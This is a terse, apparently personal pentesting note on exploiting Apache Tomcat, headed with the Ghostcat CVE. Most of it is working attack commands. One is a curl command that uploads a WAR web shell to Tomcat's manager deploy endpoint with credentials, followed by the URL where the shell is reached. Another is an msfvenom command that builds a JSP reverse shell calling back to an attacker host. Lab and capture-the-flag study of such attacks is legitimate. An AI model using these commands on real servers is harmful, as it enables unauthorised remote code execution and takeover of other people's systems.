564 B
564 B
Ghostcat
- CVE-2020-1938
- Msfconsole or exploitdb
- Craft a manual war shell shown at hacktrick's tomcat site
- upload the file via
curl -T ./webshell.war -u 'user:password' http://$TARGET_IP:8080/manager/text/deploy?path=/shello
- Visit the webshell at
$TARGET_IP:8080/shello/
- Alternatively use a war reverse shell via
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4449 -f war -o revshell.war